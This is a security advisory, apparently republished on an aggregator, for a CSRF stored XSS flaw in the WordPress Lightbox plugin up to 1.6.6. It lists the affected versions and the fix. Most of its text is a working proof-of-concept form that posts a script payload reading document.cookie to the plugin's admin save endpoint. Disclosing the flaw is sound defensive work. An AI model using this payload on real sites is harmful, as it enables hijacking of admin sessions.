Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

Lightbox <= 1.6.6 CSRF Stored XSS

0
0
Homepage

https://wordpress.org/plugins/lightbox/

Overview

Due to a lack of CSRF mitigation and entity encoding in the output generated by /admin/view/huge_it_light_box.php , it is possible to store and execute scripts in the context of an admin user.

CVSS Score

4.8

CVSS Vector

(AV:N/AC:M/Au:N/C:P/I:P/A:N/E:F/RL:OF/RC:C)

Versions Affected

1.6.6 and below

Solution

Upgrade to version 1.6.8

Proof of Concept <form action="http://[target]/wp-admin/admin.php?page=huge_it_light_box&hugeit_task=save" method="post"> <input type="text" name="light_box_speed" value=""><script>alert(document.cookie)</script>"> <input type="text" name="light_box_style" value="1" /> <input type="text" name="light_box_transition" value="elastic" /> <input type="text" name="light_box_fadeout" value="300" /> <input type="text" name="light_box_title" value="false" /> <input type="text" name="params[light_box_opacity]" value="20" /> <input type="text" name="params[light_box_open]" value="false" /> <input type="text" name="params[light_box_overlayclose]" value="false" /> <input type="text" name="params[light_box_overlayclose]" value="true" /> <input type="text" name="params[light_box_esckey]" value="false" /> <input type="text" name="params[light_box_arrowkey]" value="false" /> <input type="text" name="params[light_box_loop]" value="false" /> <input type="text" name="params[light_box_loop]" value="true" /> <input type="text" name="params[light_box_closebutton]" value="false" /> <input type="text" name="params[light_box_closebutton]" value="true" /> <input type="text" name="params[light_box_fixed]" value="false" /> <input type="text" name="params[light_box_fixed]" value="true" /> <input type="text" name="params[slider_title_position]" value="5" /> <input type="text" name="params[light_box_size_fix]" value="false" /> <input type="text" name="params[light_box_width]" value="500" /> <input type="text" name="params[light_box_height]" value="500" /> <input type="text" name="params[light_box_maxwidth]" value="768" /> <input type="text" name="params[light_box_maxheight]" value="500" /> <input type="text" name="params[light_box_initialwidth]" value="300" /> <input type="text" name="params[light_box_initialheight]" value="100" /> <input type="text" name="params[light_box_slideshow]" value="false" /> <input type="text" name="params[light_box_slideshowspeed]" value="2500" /> <input type="text" name="params[light_box_slideshowauto]" value="false" /> <input type="text" name="params[light_box_slideshowauto]" value="true" /> <input type="text" name="params[light_box_slideshowstart]" value="start slideshow" /> <input type="text" name="params[light_box_slideshowstop]" value="stop slideshow" /> <input type="text" name="params[watermarket_image]" value="false" /> <input type="text" name="params[watermark_width]" value="0" /> <input type="text" name="params[watermark_transparency]" value="0" /> <input type="submit" value="submit"> </form>

Viewing all articles
Browse latest Browse all 12749